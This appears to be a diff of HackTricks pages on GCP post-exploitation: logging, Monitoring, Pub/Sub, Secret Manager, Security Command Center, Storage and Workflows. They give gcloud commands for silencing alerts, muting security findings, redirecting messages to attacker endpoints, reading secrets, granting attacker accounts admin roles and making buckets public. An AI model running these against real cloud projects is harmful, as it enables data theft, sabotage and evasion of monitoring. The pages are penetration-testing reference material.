# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,114 @@
# GCP - Monitoring Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Monitoring
For more information check:
{{#ref}}
../gcp-services/gcp-monitoring-enum.md
{{#endref}}
For other ways to disrupt logs check:
{{#ref}}
gcp-logging-post-exploitation.md
{{#endref}}
### `monitoring.alertPolicies.delete`
Delete an alert policy:
```bash
gcloud alpha monitoring policies delete <policy>
```
### `monitoring.alertPolicies.update`
Disrupt an alert policy:
```bash
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled
# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels
# Change notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL
# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>
```
### `monitoring.dashboards.update`
Modify a dashboard to disrupt it:
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''
```
### `monitoring.dashboards.delete`
Delete a dashboard:
```bash
# Delete dashboard
gcloud monitoring dashboards delete <dashboard>
```
### `monitoring.snoozes.create`
Prevent policies from generating alerts by creating a snoozer:
```bash
# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \
--end-time="2023-03-07T23:59:59.5-0500"
```
### `monitoring.snoozes.update`
Update the timing of a snoozer to prevent alerts from being generated during the window the attacker is interested in:
```bash
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME
# Modify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
```
### `monitoring.notificationChannels.delete`
Delete a configured channel:
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>
```
### `monitoring.notificationChannels.update`
Update labels of a channel to disrupt it:
```bash
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,140 @@
# GCP - Pub/Sub Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Pub/Sub
For more information about Pub/Sub check the following page:
{{#ref}}
../gcp-services/gcp-pub-sub.md
{{#endref}}
### `pubsub.topics.publish`
Publish a message in a topic, useful to **send unexpected data** and trigger unexpected functionalities or exploit vulnerabilities:
```bash
# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"
```
### `pubsub.topics.detachSubscription`
Useful to prevent a subscription from receiving messages, maybe to avoid detection.
```bash
gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
```
### `pubsub.topics.delete`
Useful to prevent a subscription from receiving messages, maybe to avoid detection.\
It's possible to delete a topic even with subscriptions attached to it.
```bash
gcloud pubsub topics delete <TOPIC NAME>
```
### `pubsub.topics.update`
Use this permission to update some settings of the topic to disrupt it, like `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`...
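For instance, a sketch lowering the topic retention so messages expire almost immediately (the topic name is a placeholder):
```bash
gcloud pubsub topics update <topic-name> --message-retention-duration=10m
```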
### `pubsub.topics.setIamPolicy`
Give yourself permission to perform any of the previous attacks.
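For example (a sketch; the member is a placeholder):
```bash
gcloud pubsub topics add-iam-policy-binding <topic-name> --member="user:attacker@gmail.com" --role="roles/pubsub.admin"
```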
### `pubsub.subscriptions.create`, `pubsub.topics.attachSubscription`, (`pubsub.subscriptions.consume`)
Get all the messages in a web server:
```bash
# Create a push subscription and receive all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>
```
Create a subscription and use it to **pull messages**:
```bash
# This will retrieve a non-ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>
# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted
```
### `pubsub.subscriptions.delete`
**Deleting a subscription** could be useful to disrupt a log processing system or something similar:
```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
```
### `pubsub.subscriptions.update`
Use this permission to update some setting so messages are stored in a place you can access (URL, BigQuery table, Bucket), or just to disrupt it.
```bash
gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>
```
### `pubsub.subscriptions.setIamPolicy`
Give yourself the permissions needed to perform any of the previously commented attacks.
### `pubsub.schemas.attach`, `pubsub.topics.update`, (`pubsub.schemas.create`)
Attach a schema to a topic so that messages don't conform to it and therefore the topic is disrupted.\
If there aren't any schemas you might need to create one.
```json:schema.json
{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}
```
```bash
# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<schema-id> \
--message-encoding=json
```
### `pubsub.schemas.delete`
It might look like that by deleting a schema you would be able to send messages that don't conform to it. However, as the schema will be deleted, no message will actually get into the topic at all. So this is **USELESS**:
```bash
gcloud pubsub schemas delete <SCHEMA NAME>
```
### `pubsub.schemas.setIamPolicy`
Give yourself the permissions needed to perform any of the previously commented attacks.
### `pubsub.snapshots.create`, `pubsub.snapshots.seek`
This will create a snapshot of all the un-ACKed messages and put them back into the subscription. Not very useful for an attacker, but here it is:
```bash
gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,22 @@
# GCP - Secretmanager Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Secretmanager
For more information about Secret Manager check:
{{#ref}}
../gcp-services/gcp-secrets-manager-enum.md
{{#endref}}
### `secretmanager.versions.access`
This gives you access to read the secrets stored in Secret Manager, which might help to escalate privileges (depending on which information is stored inside the secret):
```bash
# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,58 @@
# GCP - Security Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Security
For more information check:
{{#ref}}
../gcp-services/gcp-security-enum.md
{{#endref}}
### `securitycenter.muteconfigs.create`
Prevent generation of findings that could detect an attacker by creating a `muteconfig`:
```bash
# Create Muteconfig
gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
```
### `securitycenter.muteconfigs.update`
Prevent generation of findings that could detect an attacker by updating a `muteconfig`:
```bash
# Update Muteconfig
gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
```
### `securitycenter.findings.bulkMuteUpdate`
Mute findings based on a filter:
```bash
# Mute based on a filter
gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""
```
A muted finding won't appear in the SCC dashboard and reports.
### `securitycenter.findings.setMute`
Mute specific findings based on their source, finding ID, etc.:
```bash
gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED
```
### `securitycenter.findings.update`
Update a finding to indicate erroneous information:
```bash
gcloud scc findings update myFinding --organization=123456 --source=5678 --state=INACTIVE
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,34 @@
# GCP - Storage Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Storage
For more information about Cloud Storage check this page:
{{#ref}}
../gcp-services/gcp-storage-enum.md
{{#endref}}
### Give Public Access
It's possible to give external users (logged into GCP or not) access to bucket contents. However, by default buckets have public access prevention enabled, so the option to expose them publicly is disabled:
```bash
# Disable public prevention
gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention
# Make all objects in a bucket public
gcloud storage buckets add-iam-policy-binding gs://BUCKET_NAME --member=allUsers --role=roles/storage.objectViewer
## I don't think you can make specific objects public just with IAM
# Make a bucket or object public (via ACL)
gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,role=READER
gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER
```
If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`
To access open buckets via browser, access the URL `https://<bucket_name>.storage.googleapis.com/` or `https://<bucket_name>.storage.googleapis.com/<object_name>`
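For example (a minimal sketch):
```bash
curl "https://<bucket_name>.storage.googleapis.com/<object_name>"
```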
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,21 @@
# GCP - Workflows Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Workflows
Basic information:
{{#ref}}
../gcp-services/gcp-workflows-enum.md
{{#endref}}
### Post Exploitation
The post-exploitation techniques are actually the same as the ones shared in the Workflows Privesc section:
{{#ref}}
../gcp-privilege-escalation/gcp-workflows-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}